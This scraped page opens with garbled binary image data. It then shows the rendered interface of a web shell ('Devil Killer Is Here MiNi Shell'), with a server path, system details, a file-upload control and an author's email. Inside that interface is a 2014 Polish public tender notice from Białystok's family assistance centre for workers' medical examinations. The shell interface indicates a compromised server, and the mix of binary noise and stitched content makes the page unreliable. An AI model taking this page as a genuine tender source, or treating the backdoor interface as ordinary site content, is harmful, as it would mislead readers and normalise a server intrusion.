JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20140224/

Linux 9dbcd5f6333d 5.15.0-102-generic #112-Ubuntu SMP Tue Mar 5 16:50:32 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20140224/63800-N-2014.html

<p class="kh_header"><b>Białystok: Świadczenie usług medycznych w zakresie profilaktycznych badań lekarskich  na rzecz pracowników Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku.</b><br>
<b>Numer ogłoszenia: 63800 - 2014; data zamieszczenia: 24.02.2014</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku , ul. Malmeda 8, 15-440 Białystok, woj. podlaskie, tel. 0-85 678 31 03, faks 0-85 678 31 00.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> http:// www.mopr.bialystok.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Świadczenie usług medycznych w zakresie profilaktycznych badań lekarskich  na rzecz pracowników Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku..</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> 1. Przedmiotem zamówienia jest świadczenie przez Wykonawcę na rzecz Zamawiającego usług medycznych z zakresu medycyny pracy, polegających na:

a) wykonywaniu  profilaktycznych badań lekarskich pracowników Zamawiającego oraz kandydatów do pracy u Zamawiającego, tj. badań wstępnych, okresowych, kontrolnych, wymaganych przez Kodeks pracy, w tym uzależnionych od czynnika narażenia występującego na stanowisku pracy, tj. dotyczącym osób pracujących na stanowiskach decyzyjnych i związanych z odpowiedzialnością, dla pracowników administracyjno-biurowych pracujących przy komputerze dłużej niż 4 godziny dziennie,  dla osób pracujących na wysokości do 3 m i powyżej 3m,  dla osób prowadzących samochody służbowe (prawo jazdy kat. B) oraz  osób niepełnosprawnych 
( celowość zastosowania skróconej normy czasu pracy),

b) wykonywaniu badań diagnostycznych, laboratoryjnych w zakresie  niezbędnym do wydania orzeczeń lekarskich,

c) wydawaniu orzeczeń lekarskich do celów określonych w Kodeksie pracy i przepisach wydanych na jego podstawie,

d) udziale lekarza medycyny pracy w posiedzeniach komisji bezpieczeństwa i higieny pracy powołanej w trybie art. 23712  Kodeksu pracy.

2. Ilość i rodzaj usług z zakresu medycyny pracy, stanowiących przedmiot niniejszego zamówienia, określona została w Formularzu cenowym, stanowiącym załącznik Nr 2 do specyfikacji istotnych warunków zamówienia.

3. Usługi stanowiące przedmiot niniejszego zamówienia, należy wykonywać zgodnie z obowiązującymi przepisami, w zakresie określonym w szczególności w:
- ustawie z dnia 26 czerwca 1974r. Kodeks pracy (Dz. U. z 1998r. Nr 21, poz. 94 z późn. zm.)
- ustawie z dnia 27 czerwca 1997r. o służbie medycyny pracy (Dz. U. z 2004r. Nr 125, poz. 1317 z późn. zm.),
- ustawie z dnia 15 kwietnia 2011r. o działalności leczniczej (Dz. U. z 2013r. poz. 217),
- rozporządzeniu Ministra Zdrowia i Opieki Zdrowotnej z dnia 30 maja 1996r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996r. Nr 69, poz. 332 z późn. zm.),

4. Z usług medycznych w ramach medycyny pracy korzystać będą pracownicy Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku lub kandydaci do pracy w Miejskim Ośrodku Pomocy Rodzinie w Białymstoku, sukcesywnie według rzeczywistych potrzeb Zamawiającego, na podstawie imiennego skierowania, według wzoru Zamawiającego, zawierającego m.in.:
- imię, nazwisko i PESEL osoby skierowanej,
- rodzaj badania profilaktycznego jakie powinno być wykonane (wstępne, okresowe, kontrolne),
- stanowisko na jakim jest lub będzie zatrudniona skierowana osoba,
- informacje o występowaniu na danym stanowisku pracy czynników szkodliwych lub uciążliwych do pracy,
- pieczątkę  Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku,
- pieczątkę i podpis uprawnionego pracownika Zamawiającego kierującego na badania.

5. W przypadku osób niepełnosprawnych, lekarz prowadzący badania profilaktyczne, będzie zobowiązany do wydania zaświadczenia o celowości stosowania skróconej normy czasu pracy w związku z art. 15 ustawy z dnia 27 sierpnia 1997r. o rehabilitacji zawodowej i społecznej oraz zatrudnianiu  osób niepełnosprawnych (Dz. U. z 2011r. Nr 127, poz. 721 z późn. zm.). Wydanie powyższego zaświadczenia nie powoduje zmiany ceny jednostkowej badania profilaktycznego.

6. Zamawiający wymaga, aby wszystkie usługi medyczne wynikające z przedmiotu zamówienia, o których mowa w pkt. 3.1. SIWZ, świadczone były na terenie miasta Białegostoku, w jednym lub kilku placówkach medycznych, usytuowanych w odległości  (w promieniu) do 3 km od siedziby Miejskiego Ośrodka Pomocy Rodzinie w Białymstoku, tj. od ul. Malmeda 8. 

7. W ramach realizacji przedmiotu zamówienia Wykonawca zobowiązany będzie do:

a) realizacji przedmiotu zamówienia zgodnie z obowiązującymi w tym zakresie przepisami i z najwyższą starannością, a także do ścisłej i stałej współpracy z Zamawiającym,

b) zapewnienia pracownikom Zamawiającego lub kandydatom do pracy u Zamawiającego możliwości rezerwacji usług  telefonicznie lub osobiście. Czas oczekiwania na badania z zakresu medycyny pracy nie powinien przekroczyć 3 dni roboczych od dnia zgłoszenia, a w przypadku osób po długotrwałej nieobecności spowodowanej zwolnieniem lekarskim, badania powinny zostać wykonane w terminie ostatniego dnia zwolnienia lekarskiego pracownika lub najpóźniej dnia następnego, 
c) informowania telefonicznie Zamawiającego oraz osobę kierowaną na badania o ewentualnych zmianach ustalonego terminu pierwszej wizyty i uzgodnienia innego terminu wizyty, dogodnego dla osoby kierowanej na badania,
d) wykonywania badań i wydania orzeczenia lekarskiego w ciągu 3 dni roboczych od stawienia się u Wykonawcy pracownika lub kandydata do pracy  ze skierowaniem. W przypadku konieczności wykonania  badań dodatkowych, zleconych przez lekarza medycyny pracy, okres ten może wynosić 5 dni roboczych.

e) świadczenia usług medycznych wynikające z przedmiotu zamówienia w dni robocze, od poniedziałku do piątku, w godz. 800 - 1430 ,

f) przeprowadzania tylko niezbędnych badań, zgodnych z obowiązującymi w stosunku do danego badania na określonym stanowisku pracy przepisami, chyba że lekarz stwierdzi celowość przeprowadzenia badań dodatkowych. W przypadku gdy osoba kierowana przez Zamawiającego na badania, posiadać będzie ważne cząstkowe badanie/badania, niezbędne do wydania końcowego orzeczenia, Wykonawca  powinien uwzględnić to badanie, nie obciążając Zamawiającego dodatkowymi kosztami.  W przypadku konieczności przeprowadzenia badań i konsultacji osób skierowanych przez Zamawiającego nie objętych niniejszym zamówieniem, o których każdorazowo zadecyduje lekarz Wykonawcy, zgodnie z § 2 ust. 2 rozporządzeniu Ministra Zdrowia i Opieki Zdrowotnej z dnia 30 maja 1996. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996r. Nr 69, poz. 332 z późn. zm.), koszt tych świadczeń zostanie ustalony na podstawie aktualnego cennika Wykonawcy,  a wskazana przez Zamawiającego w umowie osoba do kontaktu, zostanie poinformowana o konieczności ich wykonania,

g) przedłożenia Zamawiającemu, niezwłocznie po zawarciu umowy, harmonogramu pracy poszczególnych poradni oraz laboratorium, a także aktualnych numerów telefonów placówek Wykonawcy świadczących usługi medyczne. Wykonawca zobowiązany będzie do niezwłocznego powiadamiania Zamawiającego o wszelkich zmianach w w/w zakresie,

h) prowadzenia i przechowywania stosownej dokumentacji medycznej indywidualnie dla każdego pracownika: m.in. kart badania profilaktycznego, rejestru wydanych orzeczeń,

i) sporządzania wykazów osób przebadanych w danym miesiącu, zawierających imię i nazwisko oraz rodzaj badania, które stanowić będą załącznik do faktury,

j) świadczenia usług medycznych przez personel lekarski, pielęgniarki i inny, posiadający odpowiednie kwalifikacje i uprawnienia określone w § 7 Rozporządzenia Ministra Zdrowia i Opieki Społecznej z dnia 30 maja 1996 r. w sprawie przeprowadzania badań lekarskich pracowników, zakresu profilaktycznej opieki zdrowotnej nad pracownikami oraz orzeczeń lekarskich wydawanych do celów przewidzianych w Kodeksie pracy (Dz. U. z 1996r. Nr 69, poz. 332 z późn. zm.), oraz rozporządzeniem Ministra Zdrowia z dnia 20 lipca 2011r. w sprawie kwalifikacji wymaganych od pracowników na poszczególnych rodzajach stanowisk pracy w podmiotach leczniczych niebędących przedsiębiorcami (Dz. U. z 2011r.  Nr 151, poz. 896) ,

k) świadczenia usług medycznych zgodnie z przepisami ustawy z dnia 05 grudnia.1996r. o zawodzie lekarza i lekarza dentysty (Dz. U. z 2011r. Nr 277, poz. 1634 z późn. zm.) oraz ustawy z dnia 15 lipca 2011r.  o zawodach pielęgniarki i położnej (Dz. U. z 2011r. Nr 174, poz. 1039 z późn. zm.), zgodnie ze wskazaniami aktualnej wiedzy medycznej, dostępnymi mu metodami i środkami rozpoznawania chorób oraz zasadami etyki zawodowej, respektując prawa badanego,

8. Wykonawca powinien spełniać wymogi zawarte w Rozporządzeniu Ministra Zdrowia z dnia 26 czerwca 2012r. w sprawie szczegółowych wymagań, jakim powinny odpowiadać pomieszczenia i urządzenia podmiotu wykonującego działalność leczniczą (Dz. U. z 2012r., poz. 739).

9. Realizując przedmiot zamówienia Wykonawca zobowiązany będzie do przestrzegania przepisów  ustawy z dnia 29 sierpnia 1997 r. o ochronie danych osobowych (Dz. U. z 2002 r. Nr 101, poz. 926 z późn. zm.). 

10. Zamawiający zastrzega sobie możliwość zmniejszenia liczby badań wskazanych przez Zamawiającego w Formularzu cenowym, stanowiącym załącznika nr 2 do SIWZ,  w ilości nieprzekraczającej 30% wartości umowy z prawem proporcjonalnego zmniejszenia ceny oraz zmian ilości i rodzajów badań w ramach wynagrodzenia umownego. Z tytułu zmniejszenia ilości badań,  nie przysługuje Wykonawcy dodatkowe wynagrodzenie oraz żadne roszczenia cywilnoprawne wobec Zamawiającego.

11. Dodatkowe warunki dotyczące przedmiotu zamówienia:
a) termin płatności:  do 14 dni od daty otrzymania przez Zamawiającego faktury/rachunku,
b) nie przewiduje się wypłacania zaliczek na poczet wykonania zamówienia,
c) forma i warunki zapłaty - jak we wzorze umowy - załącznik nr 7 do specyfikacji istotnych warunków  zamówienia,

12. Podwykonawstwo:

a) Zamawiający nie zastrzega, że Wykonawca ma obowiązek osobistego wykonania kluczowych części zamówienia. Wykonawca może powierzyć wykonanie części zamówienia podwykonawcy.

b) W przypadku powierzenia wykonania części zamówienia podwykonawcom, Zamawiający żąda wskazania przez Wykonawcę w Formularzu oferty części zamówienia, której wykonanie zamierza powierzyć podwykonawcom oraz podania przez Wykonawcę nazw (firm) podwykonawców, na których zasoby wykonawca powołuje się na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp.

c) Jeżeli zmiana albo rezygnacja z podwykonawcy dotyczy podmiotu, na którego zasoby Wykonawca powoływał się, na zasadach określonych w art. 26 ust. 2b ustawy Pzp, w celu wykazania spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 ustawy Pzp, Wykonawca jest obowiązany wykazać Zamawiającemu, iż proponowany inny podwykonawca lub Wykonawca samodzielnie spełnia je w stopniu nie mniejszym niż wymagany w trakcie postępowania o udzielenie zamówienia.

d) W przypadku nie wskazania części zamówienia, która ma być realizowana przez podwykonawcę Zamawiający uzna, że całość zamówienia będzie wykonywana przez Wykonawcę osobiście..</p>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 85.12.10.00-3, 85.12.12.00-5.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 29.02.2016.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Zamawiający nie wymaga wniesienia wadium.</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III. 3.1) Uprawnienia do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Warunek ten zostanie spełniony, jeżeli Wykonawca wykaże, że jest wpisany do
 rejestru  podmiotów  wykonujących działalność leczniczą, prowadzonego zgodnie z 
przepisami ustawy z dnia 15 kwietnia 2011 r. o działalności leczniczej (Dz. U. Nr
2013, poz. 217).</p>
</li></ul></li><li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 9.1. lit. a SIWZ.</p>
</li></ul></li><li><p><b>III.3.3) Potencjał techniczny</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 9.1. lit. a SIWZ.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 9.1. lit. a SIWZ.</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>Zamawiający odstępuje od opisu sposobu dokonywania oceny spełniania warunku w tym zakresie. Zamawiający dokona oceny spełnienia warunku na podstawie oświadczenia o spełnianiu warunków udziału w postępowaniu, o którym mowa w pkt 9.1. lit. a SIWZ.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">potwierdzenie posiadania uprawnień do wykonywania określonej działalności lub czynności, jeżeli przepisy prawa nakładają obowiązek ich posiadania, w szczególności koncesje, zezwolenia lub licencje;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><br><p class="bold">

III.5) INFORMACJA O DOKUMENTACH POTWIERDZAJĄCYCH, ŻE OFEROWANE DOSTAWY, USŁUGI LUB ROBOTY BUDOWLANE ODPOWIADAJĄ OKREŚLONYM WYMAGANIOM</p>
<p class="bold">W zakresie potwierdzenia, że oferowane roboty budowlane, dostawy lub usługi odpowiadają określonym wymaganiom należy przedłożyć:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc">
<li style="margin-bottom: 12px;"><p style="margin: 0px; padding: 0px;">inne dokumenty</p>
<p style="margin: 0px; padding: 0px;">wykaz placówek medycznych, w których świadczone będą usługi medyczne stanowiące przedmiot zamówienia wraz z informacją o ich lokalizacji (podać adres) na terenie miasta Białegostoku.</p></li>



</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Zamawiający wymaga także dołączenia do oferty:
a) wypełnionego i podpisanego Formularza oferty z wykorzystaniem wzoru stanowiącego załącznik  nr 1 oraz  Formularza cenowego z wykorzystaniem wzoru stanowiącego załącznik nr 2 do specyfikacji istotnych warunków zamówienia,  
b) pełnomocnictwa podmiotów występujących wspólnie (np. konsorcjum, spółka cywilna),
c) w przypadku gdy Wykonawcę reprezentuje pełnomocnik, do oferty należy dołączyć pełnomocnictwo, z którego wynika zakres umocowania, podpisane przez osoby uprawnione do reprezentowania Wykonawcy.</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Zamawiający dopuszcza możliwość dokonania zmiany warunków zawartej umowy w stosunku do treści oferty, na podstawie której wybrano Wykonawcę, polegającą na:

a) zmianie terminu realizacji umowy w przypadku:
- jeżeli jego niedotrzymanie wynika z działania siły wyższej, 
- wystąpienia okoliczności niezależnych od Wykonawcy przy zachowaniu przez niego należytej staranności, skutkujących niemożnością dotrzymania terminu realizacji przedmiotu umowy,
- niemożliwości realizacji przedmiotu umowy w zakładanym terminie z przyczyn organizacyjnych leżących po stronie Zamawiającego,

b) zmianie w zakresie przedmiotu umowy:

- jeżeli nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację przedmiotu zamówienia,
- zmianie w zakresie przedmiotu umowy w związku ze zmniejszeniem liczby badań oraz zmianą ilości i rodzajów badań w ramach wynagrodzenia umownego, bez konieczności zachowania formy pisemnej,

c) zmianie miejsca wykonania badań, pod warunkiem że zmiana jest konieczna z przyczyn niezależnych od Wykonawcy, nie ulegnie zmianie miejscowość ich wykonania i  zostaną zachowane warunki określone  § 4 pkt 2  umowy oraz pkt. 3.6. SIWZ. Nie wymaga zmiany umowy, jednorazowa zmiana miejsca wykonania badania wynikająca z awarii sprzętu diagnostycznego Wykonawcy, 
d) wprowadzeniu podwykonawcy (w sytuacji, gdy Wykonawca w ofercie zadeklarował realizację siłami własnymi) za wyraźną zgodą Zamawiającego oraz na warunkach określonych w SIWZ,

e ) zmianie wynagrodzenia w przypadku:
- ustawowej zmiany stawki podatku od towarów i usług (VAT) na dany rodzaj usługi o kwotę powstałą w wyniku zmiany stawki podatku VAT,
- w przypadku zmniejszenia liczby badań oraz zmianą ilości i rodzajów badań w ramach wynagrodzenia umownego- wówczas zmiana wynagrodzenia będzie obliczona w oparciu o ceny jednostkowe wymienione w ofercie Wykonawcy, będącej załącznikiem do umowy, z uwzględnieniem ilości badań rzeczywiście wykonanych, bez konieczności zachowania pisemnej formy zmiany umowy,

f) zmianie umowy wynikającej z innej, niemożliwej do przewidzenia w momencie zawarcia umowy, okoliczności prawnej, ekonomicznej lub technicznej, za którą żadna ze stron nie ponosi odpowiedzialności, skutkującą brakiem możliwości należytego wykonania umowy lub zmiana ta jest korzystna dla Zamawiającego.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> http:// www.mopr.bialystok.pl<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Miejski Ośrodek Pomocy Rodzinie w Białymstoku, ul. Malmeda 8, 15-440 Białystok, woj. podlaskie..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 04.03.2014 godzina 09:45, miejsce: siedziba Zamawiającego: Miejski Ośrodek Pomocy Rodzinie w Białymstoku, ul. Malmeda 8, 15-440 Białystok, sekretariat..</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com